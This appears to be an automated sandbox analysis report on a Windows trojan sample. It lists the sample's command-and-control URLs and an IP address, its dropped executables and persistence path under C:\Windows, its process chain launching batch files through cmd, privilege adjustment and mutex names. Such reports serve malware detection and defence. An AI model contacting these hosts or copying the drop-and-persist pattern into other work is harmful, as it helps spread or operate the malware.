Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.com/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.net/tldr.php?newinf=1LA
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnu.ru/
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedur
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: tldr[1].htm.6.dr	String found in binary or memory: http://ww88.ssofhoseuegsgrfnu.ru/
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: winsvcs.exe.0.dr	String found in binary or memory: http://www.codeproject.com/
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_88feab21-1

System Summary

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: XBVdJN.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	File created: C:\Windows\94000696690303050			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	File created: C:\Windows\94000696690303050\winsvcs.exe			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_0040B517	0_2_0040B517
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_004338B4	0_2_004338B4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_0042A1E9	0_2_0042A1E9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00433DF8	0_2_00433DF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00436DB0	0_2_00436DB0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00435ABE	0_2_00435ABE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_0043433C	0_2_0043433C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00417F80	0_2_00417F80
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00616076	1_2_00616076
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00616D00	1_2_00616D00
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_0040B517	6_2_0040B517
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_004338B4	6_2_004338B4
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_0042A1E9	6_2_0042A1E9
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00433DF8	6_2_00433DF8
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00436DB0	6_2_00436DB0
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00435ABE	6_2_00435ABE
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_0043433C	6_2_0043433C
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00417F80	6_2_00417F80
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_0040B517	9_2_0040B517
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_004338B4	9_2_004338B4
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_0042A1E9	9_2_0042A1E9
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00433DF8	9_2_00433DF8
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00436DB0	9_2_00436DB0
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00435ABE	9_2_00435ABE
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_0043433C	9_2_0043433C
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00417F80	9_2_00417F80
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E6076	10_2_006E6076
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E6D00	10_2_006E6D00
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_0040B517	14_2_0040B517
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_004338B4	14_2_004338B4
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_0042A1E9	14_2_0042A1E9
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00433DF8	14_2_00433DF8
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00436DB0	14_2_00436DB0
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00435ABE	14_2_00435ABE
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_0043433C	14_2_0043433C
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00417F80	14_2_00417F80
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00186076	15_2_00186076
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00186D00	15_2_00186D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\XBVdJN.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: String function: 00426FAC appears 34 times
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: String function: 00426FAC appears 102 times
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: String function: 00429BDE appears 51 times

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584

Source: LisectAVT_2403002B_290.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: winsvcs.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: MyProg.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: Windows Archive Manager.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: LisectAVT_2403002B_290.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: XBVdJN.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: XBVdJN.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: XBVdJN.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@27/28@111/13

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_0061119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	1_2_0061119F
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	10_2_006E119F
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_0018119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	15_2_0018119F

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00401E97 CreateToolhelp32Snapshot,Process32First,CharLowerA,CloseHandle,Process32Next,FindCloseChangeNotification,

0_2_00401E97

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_004020F8 CoInitialize,CoCreateInstance,

0_2_004020F8

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00410C90 GetCurrentThreadId,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindResourceA,FindResourceA,LoadResource,LockResource,LoadResource,LockResource,DialogBoxIndirectParamA,GetLastError,GlobalHandle,GlobalFree,SetLastError,GetLastError,GetLastError,RaiseException,

0_2_00410C90

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\94000696690303050\winsvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\4950050503930
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

File created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

File read: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe "C:\Users\user\Desktop\LisectAVT_2403002B_290.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Process created: C:\Windows\94000696690303050\winsvcs.exe C:\Windows\94000696690303050\winsvcs.exe
Source: unknown	Process created: C:\Windows\94000696690303050\winsvcs.exe "C:\Windows\94000696690303050\winsvcs.exe"
Source: C:\Windows\94000696690303050\winsvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\94000696690303050\winsvcs.exe "C:\Windows\94000696690303050\winsvcs.exe"
Source: C:\Windows\94000696690303050\winsvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Process created: C:\Windows\94000696690303050\winsvcs.exe C:\Windows\94000696690303050\winsvcs.exe	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: netutils.dll	Jump to behavior
